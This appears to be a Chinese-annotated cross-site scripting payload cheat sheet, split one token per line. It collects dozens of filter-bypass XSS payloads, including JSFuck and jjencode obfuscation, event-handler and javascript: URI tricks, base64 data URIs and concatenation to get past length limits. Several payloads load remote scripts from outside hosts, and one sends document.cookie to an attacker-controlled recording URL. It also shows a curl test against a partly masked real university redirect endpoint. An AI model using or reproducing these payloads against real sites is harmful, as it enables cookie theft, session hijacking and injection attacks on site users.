-
<
script
>
alert
(
0
)</
script
>
-
<
script
>
confirm
(
1
)</
script
>
-
<
script
>
prompt
(
2
)</
script
>
-
<
script
>
\u
0061
\u
006C
\u
0065
\u
0072
\u
0074
(
3
)</
script
>
-
<
script
>[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+(![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]]+[!+[]+!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]])()</
script
>
-
<
script
>
$
=~[];
$
={
___
:++
$
,
$$$$
:(![]+
""
)[
$
],
__$
:++
$
,
$_$_
:(![]+
""
)[
$
],
_$_
:++
$
,
$_$$
:({}+
""
)[
$
],
$$_$
:(
$
[
$
]+
""
)[
$
],
_$$
:++
$
,
$$$_
:(!
""
+
""
)[
$
],
$__
:++
$
,
$_$
:++
$
,
$$__
:({}+
""
)[
$
],
$$_
:++
$
,
$$$
:++
$
,
$___
:++
$
,
$__$
:++
$
};
$
.
$_
=(
$
.
$_
=
$
+
""
)[
$
.
$_$
]+(
$
.
_$
=
$
.
$_
[
$
.
__$
])+(
$
.
$$
=(
$
.
$
+
""
)[
$
.
__$
])+((!
$
)+
""
)[
$
.
_$$
]+(
$
.
__
=
$
.
$_
[
$
.
$$_
])+(
$
.
$
=(!
""
+
""
)[
$
.
__$
])+(
$
.
_
=(!
""
+
""
)[
$
.
_$_
])+
$
.
$_
[
$
.
$_$
]+
$
.
__
+
$
.
_$
+
$
.
$
;
$
.
$$
=
$
.
$
+(!
""
+
""
)[
$
.
_$$
]+
$
.
__
+
$
.
_
+
$
.
$
+
$
.
$$
;
$
.
$
=(
$
.
___
)[
$
.
$_
][
$
.
$_
];
$
.
$
(
$
.
$
(
$
.
$$
+
"\""
+
$
.
$_$_
+(![]+
""
)[
$
.
_$_
]+
$
.
$$$_
+
"\\"
+
$
.
__$
+
$
.
$$_
+
$
.
_$_
+
$
.
__
+
"("
+
$
.
$_$
+
")"
+
"\""
)())();</
script
>
-
<
script
>+
alert
(
6
)</
script
>
-
<
script test
>
alert
(
7
)</
script
>
-
<
script
>
alert
(/
8
/)</
script
>
-
<
script src
=
data
:
text
/
javascript
,
alert
(
9
)></
script
>
-
<
script src
=
data
:
text
/
javascript
,
alert
(
10
)></
script
>
-
<
script
>
alert
(
String
.
fromCharCode
(
49
,
49
))</
script
>
-
<
script
>
alert
(/
12
/.
source
)</
script
>
-
<
script
>
setTimeout
(
alert
(
13
),
0
)</
script
>
-
<
script
>
document
[
'write'
](
14
);</
script
>
-
<
anytag onmouseover
=
alert
(
15
)>
M
-
<
anytag onclick
=
alert
(
16
)>
M
-
<
a onmouseover
=
alert
(
17
)>
M
-
<
a onclick
=
alert
(
18
)>
M
-
<
a href
=
javascript
:
alert
(
19
)>
M
-
<
button
/
onclick
=
alert
(
20
)>
M
-
<
form
><
button formaction
=
javascript
:
alert
(
21
)>
M
-
<
form
/
action
=
javascript
:
alert
(
22
)><
input
/
type
=
submit
>
-
<
form onsubmit
=
alert
(
23
)><
button
>
M
-
<
img src
=
x onerror
=
alert
(
24
)>
-
<
img src
=
x onError
=
alert
(
24
)>
大写
bypass
某些过滤
-
<
body
/
onload
=
alert
(
25
)>
-
<
body onscroll
=
alert
(
26
)><
br
><
br
><
br
><
br
><
br
><
br
><
br
><
br
><
br
><
br
><
br
><
br
><
br
><
br
><
br
><
br
><
br
><
br
><
br
><
br
><
br
><
br
><
br
><
br
><
br
><
br
><
br
><
br
><
br
><
br
><
br
><
br
><
br
><
br
><
br
><
br
><
br
><
br
><
br
><
br
><
input autofocus
>
-
<
iframe src
=
j
-
a
-
v
-
a
-
s
-
c
-
r
-
i
-
p
-
t
-
:
a
-
l
-
e
-
r
-
t
-
%
28
-
27
-
%
29
></
iframe
>
-
<
iframe src
=
"http://0x.lv/xss.swf"
></
iframe
>
-
<
iframe
/
onload
=
alert
(
document
.
domain
)></
iframe
>
-
<
IFRAME SRC
=
"javascript:alert(29);"
></
IFRAME
>
-
<
meta http
-
equiv
=
"refresh"
content
=
"0; url=data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%2830%29%3C%2F%73%63%72%69%70%74%3E"
>
-
<
object data
=
data
:
text
/
html
;
base64
,
PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ
+></
object
>
-
<
object data
=
"javascript:alert(document.domain)"
>
-
<
marquee onstart
=
alert
(
30
)></
marquee
>
-
<
isindex type
=
image src
=
1
onerror
=
alert
(
31
)>
-
<
isindex action
=
javascript
:
alert
(
32
)
type
=
image
>
-
<
input onfocus
=
alert
(
33
)
autofocus
>
-
<
input onblur
=
alert
(
34
)
autofocus
><
input autofocus
>
-
<
INPUT TYPE
=
"IMAGE"
SRC
=
x onerror
=
alert
(
35
)>
-
<
select onfocus
=
alert
(
36
)
autofocus
>
-
<
textarea onfocus
=
alert
(
37
)
autofocus
></
textarea
>
-
<
keygen onfocus
=
alert
(
38
)
autofocus
>
-
<
FRAMESET
><
FRAME SRC
=
"javascript:alert(document.domain);"
></
FRAMESET
>
-
<
frameset onload
=
alert
(
40
)>
-
<
embed src
=
"data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+"
></
embed
>
-
<
embed src
=
javascript
:
alert
(
document
.
domain
)>
-
<
math href
=
"javascript:alert(45)"
>
M
-
<
math
>
<
maction actiontype
=
""
xlink
:
href
=
"javascript:alert(46)"
>
M
-
<
math xlink
:
href
=
javascript
:
alert
(
47
)>
M
-
<
img src
=
x onerror
=
"var s=document.createElement('script');s.src="
这里填
js
地址
";document.body.appendChild(s);"
>
-
domain
=
javascript
:
location
.
href
=
alert
(
document
.
cookie
)//
-
<
img src
=#
id
=
xssyou style
=
display
:
none onerror
=
eval
(
unescape
(/
var b
=
document
.
createElement
(
"script"
);
b
.
src
=
"http://xssnow.com/zuVV?"
+
Math
.
random
();(
document
.
getElementsByTagName
(
"HEAD"
)[
0
]||
document
.
body
).
appendChild
(
b
);/.
source
));//>
-
-
<
img src
=#
id
=
xssyou style
=
display
:
none onerror
=
eval
(
unescape
(/
var b
=
document
.
createElement
(
"script"
);
b
.
src
=
"http://www.woshimaisaike.com/oWaKwi"
;(
document
.
getElementsByTagName
(
"HEAD"
)[
0
]||
document
.
body
).
appendChild
(
b
);/.
source
));//>
-
<
img src
=#
id
=
xssyou style
=
display
:
none onerror
=
eval
(
unescape
(/
var
%
20b
%
3Ddocument
.
createElement
%
28
%
22script
%
22
%
29
%
3Bb
.
src
%
3D
%
22http
%
3A
%
2F
%
2Fwww
.
woshimaisaike
.
com
%
2FoWaKwi
%
22
%
3B
%
28document
.
getElementsByTagName
%
28
%
22HEAD
%
22
%
29
%
5B0
%
5D
%
7C
%
7Cdocument
.
body
%
29.appendChild
%
28b
%
29
%
3B
/.
source
));//><//实际提交时需要使用这条,需要
url
编码>
-
伪协议:
ed2k
://|
file
|
test
|
'+alert(document.cookie)+'
|
test
/
-
[
url
=<
a id
=
"ed2k_T7V"
href
=
"ed2k://|file|test|'+alert(document.cookie)+'|test/"
target
=
"_blank"
>
1
</
a
>]
2
[/
url
]
-
<
svg
/
onload
=
document
.
body
.
appendChild
(
createElement
(/
script
/.
source
)).
src
=
String
.
fromCharCode
(
47
,
47
,
116
,
46
,
99
,
110
,
47
,
56
,
115
,
56
,
103
,
101
,
74
,
86
)
-
-
<
svg xmlns
=
"url"
><
g onload
=
"javascript:alert(1)"
></
g
></
svg
>
-
如果只允许()[]!+
$
,那么可以使用
JSFuck
,
JSOTHER
,
jjencode
、
aaencode
.
-
<
script
>
eval
(
'document.write("<\163cript/src=http://is.gd/grcGnF></\163cript>")'
);</
script
>
-
<
div style
=
"display:none"
><
img title
=
"with(top.document)body.appendChild(createElement('script')).src='http://127.0.0.1/aol.php?mail=aol'"
style
=
"" onerror=eval(this.title) src=x"
></
div
>
-
<
a href
=
"javasc
-
ript:jQuery.getScript('//xss.**/****')"
>点击查看详情</
a
>//<在<
script
>和
javascript
等字符串中间会加上<
x
>,即变成<
scr
<
x
>
ipt
>和
java
<
x
>
script
,但是这里把
javascript
中间插入换行符(即
table
或者回车键)就可以绕过了><用
jQuery
.
getScript
执行外部
js
>//需要具体环境
-
<
a href
=
"javasc
-
ript:alert(/xss/)"
>点击查看详情</
a
><
-
要换成
table
或者回车><注意:
firefox
不可以,
chrome
可以>
-
<
img width
=
0
height
=
0
onerror
=
" var NagvIw1 = window['document']['getElementsByTagName']('HEAD')['item'](0);var LVdmojAqt2 = window['document']['createElement']('script');LVdmojAqt2['type'] = 'text/javascript';LVdmojAqt2['src'] = '*****.js';NagvIw1['appendChild'](LVdmojAqt2);"
src
=
"1"
/>
-
<
img src
=
x onerror
=
document
.
body
.
appendChild
(
createElement
(/
script
/.
source
)).
src
=
alt alt
=//
km3
.
pw
>
-
<
a
href
=
javascript
:
alert
(
document
.
cookie
)><
img
src
=
XXXX
.
png
></
a
>
<
a
>与<
img
>标签配合使用,会在<
a
>标签内插入一张图片,点击图片则触发<
a
>标签
-
<
img src
=
x onerror
=
d
=
document
;
e
=
d
.
createElement
(
'script'
);
e
.
src
=
'http://127.0.0.1/eXploit.js'
;
d
.
body
.
appendChild
(
e
);>
-
<
svg
/
onload
=
prompt
(
1
)>
-
未来所有的浏览器支持
ES6
,所以可以使用下面两个
payload
:<
script
>
eval
.
call
`
$
{
'prompt\x281)'
}`</
script
>,<
script
>
eval
.
call
`
$
{
'prompt\x281)'
}`</
script
>
-
<
input value
=
""
onresize
=
"prompt(1)"
type
=
"text"
>
//
IE10
下有效
在
IE10
下,当页面第一次加载时,会调用
resize
事件
-
<
p
class
=
"comment"
title
=
""
onload
=
'prompt(1)'"></p>
-
<input value="" type=image src onerror=
-
"
prompt
(
1
)
" type="
text
">
-
<img src=x onerror=x={png:1};(function(){alert(location.href)})(x //不能注释时使用闭合,构造后为:<img src=x onerror=x={png:1};(function(){alert(location.href)})(x).png>
-
<img src=x top.onerror=alert(1)/>
-
<img src=x onerror=top["
loc
"+"
ation
"]='javascript:alert(1)'>
-
<img src=x onerror=self["
loc
"+"
ation
"]='javascript:alert(1)'>
-
<img src=x onerror=parent["
loc
"+"
ation
"]='javascript:alert(1)'>
-
<img src="
x
" onerror="
$
[
'\147\145\164S\143\162\151\160\164'
](
'\150\164\164\160\72\57\57\170\163\163\56\162\145\57\66\70\71\66'
)
"><通过jquery>
-
<img src="
x
" onerror="
[].
constructor
.
constructor
(
'aler\164(1)'
)()
">
-
<video src=http://www.baidu.com/img/bd_logo1.png onprogress=document.body.appendChild(document.createElement(/script/.source)).src=id id=//qqq.si/CVuD63>
-
<img src=x onerror=eval('window.s=document.createElement(String.fromCharCode(115,99,114,105,112,116));window.s.src=String.fromCharCode(104,116,116,112,58,47,47,120,115,115,46,114,101,47,55,48,52,50);document.body.appendChild(window.s)')>11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111
-
<video src=http://www.baidu.com/img/baidu_jgylogo3.gif onprogress=$['get\123cript']('http://w.s.js')>
-
<img src=x
-
onerror
-
=alert(1)> 利用换行绕过
-
javAScripT:eval(atob(/ZG9jdW1lbnQud3JpdGUoJzxzY3JpcHQgc3JjPWh0dHA6Ly94NTUubWh6LnB3L0hZYkJ3VT48L3NjcmlwdD4nKTs/.source)) 用//.source代替引号
-
<!--[if true]><img onerror=alert(1) src=--><form
-
action=javascript:alert(2)><input type=submit><input
-
autofocus onfocus=alert(3)><select autofocus
-
onfocus=alert(4)><textarea autofocus onfocus=alert(5)><HTML5特性>
-
<span style="
background
-
color
:
expression
(
alert
(
1
));
">
-
On/focus/=/"
/
alert
/(/
docu
/
ment
/.
cook
/
ie
/)
用/分隔关键字绕过
-
<
img width
=
"540"
height
=
"258"
style
=
"xxx:expressio/*\0*/n(if(!window.x){alert(document.domain);window.x=1;})"
src
=
"http://www.baidu.com/img/bd_logo1.png"
data_ue_src
=
"http://www.baidu.com/img/bd_logo1.png"
>
-
t
<!---><
form
><
button
+
formaction
%
3djavascript
%
3aalert
(
1
)+
autofocus
+/>
te
-
t
<!---><
form
><
button formaction
=
javascript
:
alert
(
1
)
autofocus
/>
te
-
<
img src
=
3D
# style=3D"display:none" onerror=3Dalert(0)> 3D绕过
-
<
link rel
=
import
href
=
http
://
xxx
/
xxx
.
html
>
36
版
chrome
最新支持
-
<
vmlframe xmlns
=
"urn:schemas-microsoft-com:vml"
style
=
"behavior:url(#default#vml);position:absolute;width:100%;height:100%"
src
=
"http://itsokla.duapp.com/shouzi.vml#xss"
></
vmlframe
>
-
<
img src
=
x onerror
=
eval
(
location
.
hash
.
slice
(
1
))>
-
<
video src
=
'//dwz.cn/zNNYd'
onsuspend
=
alert
(
1
)>
-
<
img
/
src
=
'x'
/
onerror
=
alert
(
1
)//
-
<!--[
if
true
]><
img onerror
=
alert
(
1
)
src
=--><
form action
=
javascript
:
alert
(
2
)><
input type
=
submit
><
input autofocus onfocus
=
alert
(
3
)><
select autofocus onfocus
=
alert
(
4
)><
textarea autofocus onfocus
=
alert
(
5
)>
-
<
form id
=
"test"
></
form
><
button form
=
"test"
formaction
=
"javascript:alert(1)"
>
X
</
button
>
<
form id
=
"test"
></
form
><
button form
=
"test"
formaction
=
"javas
-
cript:alert(1)"
>
X
</
button
>
html5
新增的实体命名编码:
-
换行实现绕过
-
<
img onreadystatechange
=
"alert(/xss/)"
src
=
x
>
-
<
img src
=
x onerror
=
alert
(/
xss
/)>
-
<
iframe src
=
"javascript:confirm(2)"
></
iframe
>
-
<
iframe src
=
"javascript:alert(/xss/)"
style
=
"display:none"
></
iframe
>
-
<
a xlink
:
href
=
javascript
:
alert
(
document
.
cookie
)>
-
<
svg
><
animateTransform attributeName
=
transform onbegin
=
alert
(
2
)>
-
<
fremeser onload
=
alert
(
1
)/>
-
<
marquee onstart
=
alert
(
2
)></
marquee
>
-
<
animateTransform attributeName
=
transform onbegin
=
alert
(
1
)>
-
<
meta http
-
equiv
=
"refresh"
content
=
"0; url=data:text/html,%3Cscript%3Ealert%281%29%3C%2fscript%3E"
>
-
<
meta http
-
equiv
=
"refresh"
content
=
"0; url=data:text/html,%3Cscript%3Ewindow.open%28%27file%3A%2f%2fC%3A%2fwindows%2fsystem32%2fcmd.exe.%27%29%3C%2fscript%3E"
>
-
<
a href
=
"java
-
script:alert(document.cookie)"
>
xx
</
a
>
-
<
a href
=
"java
-
script:alert(document.cookie)"
>
xx
</
a
>
-
?
id
=<
svg
/
onload
=
$
.
getScript
(
'//website/xxx.js'
)>
-
?
id
=<
svg
/
onload
=
eval
(
location
.
hash
.
substr
(
1
))>#
YourJSCode
-
<
svg
/
onload
=
location
.
href
=
"//yourdomain.com/record.php?"
+
escape
(
document
.
cookie
)></
svg
>
-
<
svg
/
onload
=
name
=
document
.
cookie
.
toString
()></
svg
>
-
<
svg
/
onload
=
postMessage
(
document
.
body
.
innerHTML
,
'*'
);></
svg
>
-
<
iframe src
=
"target.html?xsscode=<svg/onload=eval(name)></svg>"
name
=
"document.write('xss payload')"
/>
-
<
svg
/
onload
=
document
.
write
(
"\x3cscript/src=http://abcd.com/xss.js\x3e\x3c/script\x3e"
)></
svg
>
-
<
script
/
src
=//
18.gy
>
//
xss
短链接
20
字符
-
<
img src
=
6
onerror
=
s1
=
'scri'
;
s2
=
'pt'
;
s
=
createElement
(
s1
+
s2
);
body
.
appendChild
(
s
);
s
.
src
=
'http://t.cn/RUsPCEK'
;//////;-------->
-
绕过关键字
script
以及对>进行编码
-
<
svg
><
use xlink
:
href
=
"data:image/svg+xml;base64,PHN2ZyBpZD0icmVjdGFuZ2xlIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIiAgICB3aWR0aD0iMTAwIiBoZWlnaHQ9IjEwMCI+PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg0KIDxmb3JlaWduT2JqZWN0IHdpZHRoPSIxMDAiIGhlaWdodD0iNTAiDQogICAgICAgICAgICAgICAgICAgcmVxdWlyZWRFeHRlbnNpb25zPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hodG1sIj4NCgk8ZW1iZWQgeG1sbnM9Imh0dHA6Ly93d3cudzMub3JnLzE5OTkveGh0bWwiIHNyYz0iamF2YXNjcmlwdDphbGVydChsb2NhdGlvbikiIC8+DQogICAgPC9mb3JlaWduT2JqZWN0Pg0KPC9zdmc+#rectangle"
/></
svg
>
保存为
1.htm
作为附件发送给对方,然后对方预览
-
}</
style
><
script
>
alert
(/
xss
/)</
在
DOC
文档字体中插入
-
<
svg
><
animateTransform attributeName
=
transform dur
=
1s
onend
=
alert
(
1
)>
-
Concat
绕过长度限制:
-
<
htmnl
>
-
<
head
></
head
>
-
<
body
>
-
-
<
a onmouseover
=
"a='http:'"
>
a9
</
a
>
-
<
a onmouseover
=
"s=String.fromCharCode"
>
a10
</
a
>
-
<
a onmouseover
=
"a=a.concat(s(47))"
>
a11
</
a
>//用
String
.
fromCharCode
将
47
转换成字符/,然后用
concat
拼接到
a
上
-
<
a onmouseover
=
"a=a.concat(s(47))"
>
a12
</
a
>
-
<
a onmouseover
=
"a=a.concat('is.gd')"
>
a13
</
a
>
-
<
a onmouseover
=
"a=a.concat(s(47))"
>
a14
</
a
>
-
<
a onmouseover
=
"a=a.concat('lFYAxW')"
>
a15
</
a
>
-
<
a onmouseover
=
"r='script'"
>
a2
</
a
>
-
<
a onmouseover
=
"d=document"
>
a3
</
a
>
-
<
a onmouseover
=
"n=d.createElement(r)"
>
a4
</
a
>
-
<
a onmouseover
=
"n.src=a"
>
a5
</
a
>
-
<
a onmouseover
=
"h=d.body"
>
a6
</
a
>
-
<
a onmouseover
=
"h.appendChild(n)"
>
a7
</
a
>
-
</
body
>
-
</
html
>
-
+号拼接绕过长度限制
-
<
htmnl
>
-
<
head
></
head
>
-
<
body
>
-
-
<
a onmouseover
=
"a='http:'"
>
a9
</
a
>
-
<
a onmouseover
=
"a=a+'//is.gd'"
>
a9
</
a
>
-
<
a onmouseover
=
"a=a+'/lFYAxW'"
>
a9
</
a
>
-
<
a onmouseover
=
"r='script'"
>
a2
</
a
>
-
<
a onmouseover
=
"d=document"
>
a3
</
a
>
-
<
a onmouseover
=
"n=d.createElement(r)"
>
a4
</
a
>
-
<
a onmouseover
=
"n.src=a"
>
a5
</
a
>
-
<
a onmouseover
=
"h=d.body"
>
a6
</
a
>
-
<
a onmouseover
=
"h.appendChild(n)"
>
a7
</
a
>
-
</
body
>
-
</
html
>
Flash XSS
-
<
embed src
=
"http://cm2.in/xss.swf"
allownetworking
=
"all"
-
allowscriptaccess
=
"always"
>
不常见的on事件,可能可以绕过过滤,
-
fscommand
-
onbegin
-
ondragdrop
-
onend
-
onhashchange
-
oninput
-
onmediacomplete
-
onmediaerror
-
onmessage
-
onoffline
-
onoutofsync
-
onpause
-
onpopstate
-
onprogress
-
onredo
-
onrepeat
-
onresume
-
onreverse
-
onrowsenter
-
onrowdelete
-
onrowinserted
-
onseek
-
onstorage
-
onsyncrestored
-
ontimeerror
-
ontrackchange
-
onundo
-
onurlflip
-
seeksegmenttime
-
$ curl
-
v
"http://****.edu.cn/go.asp?url=javascript\u003aeval(location.hash.slice(1))#alert(document.cookie);"
-
*
Trying
127.0
.
0.1
...
-
*
Connected
to
127.0
.
0.1
(
127.0
.
0.1
)
port
1080
(#
0
)
-
>
GET http
://****.
edu
.
cn
/
go
.
asp
?
url
=
javascript\u
003aeval
(
location
.
hash
.
slice
(
1
))
HTTP
/
1.1
-
>
User
-
Agent
:
curl
/
7.41
.
0
-
>
Host
:
****.
edu
.
cn
-
>
Accept
:
*/*
-
>
Proxy
-
Connection
:
Keep
-
Alive
-
>
-
<
HTTP
/
1.1
200
OK
-
<
Connection
:
close
-
<
Date
:
Mon
,
27
Jun
2016
06
:
13
:
31
GMT
-
<
Server
:
Microsoft
-
IIS
/
6.0
-
<
X
-
Powered
-
By
:
ASP
.
NET
-
<
Content
-
Length
:
113
-
<
Content
-
Type
:
text
/
html
-
<
Set
-
Cookie
:
ASPSESSIONIDCCTTQQQQ
=
KLNDIOEAOHCIMEMFJMOOMCHN
;
path
=/
-
<
Cache
-
control
:
private
-
<
Proxy
-
Connection
:
keep
-
alive
-
<
-
-
<
script language
=
"javascript"
>
-
window
.
location
.
href
=
"javascript\u003aeval(location.hash.slice(1))"
;
-
</
script
>*
Closing
connection
0
-
限制信息:url字符串长度不能超过100,而且会检查一些关键字,比如url=javascript:alert(1);会被拦截,但可以用JS编码绕过。